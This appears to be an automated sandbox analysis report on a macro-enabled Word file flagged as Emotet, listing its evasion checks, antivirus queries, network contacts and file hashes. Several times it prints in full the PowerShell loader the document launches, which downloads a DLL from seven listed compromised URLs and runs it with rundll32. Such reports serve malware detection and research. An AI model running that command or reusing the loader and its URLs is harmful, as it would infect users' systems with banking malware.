Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1230			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 4.0 %

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A6620 rdtscp

14_2_615A6620

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000005.00000003.312282002.0000000004F7A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000005.00000002.340816682.0000000004A9A000.00000004.00000001.sdmp	Binary or memory string: ,d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000003.00000002.533812198.0000015122029000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.533685658.0000020B61E67000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.533555344.0000023134829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615CD1EE FindFirstFileExA,

14_2_615CD1EE

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6620 mov ecx, dword ptr fs:[00000030h]	14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6510 mov eax, dword ptr fs:[00000030h]	14_2_615A6510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B849D mov esi, dword ptr fs:[00000030h]	14_2_615B849D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615C69AA mov eax, dword ptr fs:[00000030h]	14_2_615C69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A8A50 mov eax, dword ptr fs:[00000030h]	14_2_615A8A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068DE10 mov eax, dword ptr fs:[00000030h]	16_2_0068DE10

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B81F2 IsDebuggerPresent,OutputDebugStringW,

14_2_615B81F2

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B83A7 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

14_2_615B83A7

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A6620 rdtscp

14_2_615A6620

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_615B5239
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_615B5ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_615BED41

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191			Jump to behavior

Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000015.00000002.536092754.00000000035B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D6017
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_615D60E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615CE2F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_615D57AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D597B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5B0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_615D5B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615D5A24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_615D5DE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_615CDD93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_615D5F10

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B5916 cpuid

14_2_615B5916

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B5C3C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

14_2_615B5C3C

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 0000000A.00000002.533453735.000001A70123D000.00000004.00000001.sdmp	Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000A.00000002.533595093.000001A701302000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A1A40 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

14_2_615A1A40

Windows Analysis Report 1711.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	526179
Product:	CloudBasic
Start time:	11:00:12
Start date:	22.11.2021
Sample:	1711.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	85ab297345c97bca1a5004dc537f6c1c
SHA1:	0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256:	31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
Filetype:	Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\13791789.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	6ED0F0B0046573CFBA56C98152B44F28	53FC583339C441DFFBFCF2C2F1F660C1CAD96714	A84F4C76EF86D165088979CB91506B65C3D84CB92386E3AA68EABA4EFE0C9B5E
C:\ProgramData\Microsoft\Network\Downloader\edb.log	MPEG-4 LOAS	DD06E4E46FED0F4FF0E7F22FDE2F4D31	7C97D38EBD4C262A598C1E4C5332C840B65FC479	E024B0D15BE41E914C20F1031C7375E799A95B6411D94B1DD0B79F3C835C1350
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x985cf3fb, page size 16384, DirtyShutdown, Windows version 10.0	9B95D532A2A3CCF486623DBBC6331B0B	72CE33EB727A002D41BD78A0841A313C775C651C	D8A2964C164F32BA48DBFEA35AD0CA47E8EBFAECF946663022C8805C3203E47A
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	7ADE2B01C2356CD8E36C319B8D345D96	9D2F0EDDEBF85DD6E816C3A81FF9EFA1F3A32B9F	19FBBA2859455466CA003838C05CC59CAFD777B63A5DF63D3BDE5C396C0BB2DB
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\228B70BA-96BF-49A2-BAE9-6D7972869BA5	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	BC5B16546FF935863E164008B70EBB46	5ACABF8FB71E9F94376C76CE57C63A3D428C1D6C	AB486F6BC137D7EFC6FB1EDA506BE4182AA27DD981E403375129EB6CD4CFF0D1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5EEF27A6.png	PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced	D3C11BC087FAF4372F4C5D37E06FCFFD	40A9FE4D47DADFDB1463D63F14D6D60641AC19E5	6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp	Composite Document File V2 Document, Cannot read section info	F891379A1806E6A11733C87FB30DB025	553685217C2A08B1B56E59A749A9FB2CEF696A35	752CAC548A161A64B01DC200B4810A2308DC4B8B73AC9CA0454855056E6B73F7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{521AB53C-1F2D-413C-8011-B893289A85E3}.tmp	data	32649384730B2D61C9E79D46DE589115	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9EE2F9D3-844A-448C-93FB-84314B295DC1}.tmp	data	91473136D20E3046BECA18C78CE9BBE7	014B29FADC9F1EB72ADEBAB7A157BF9789953462	7A57B63B9EB2FA46EC6C49F9D792DE64710966EA99730E6B18702F49D988A15F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C4306DA8-3134-42DC-857A-E2C8FA5CD236}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	937C6E940577634844311E349BD4614D	379440E933201CD3E6E6BF9B0E61B7663693195F	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
